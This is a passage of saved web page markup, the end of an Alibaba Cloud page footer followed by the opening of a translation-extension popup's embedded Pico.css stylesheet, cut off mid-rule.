<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
|
|||
|
|
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|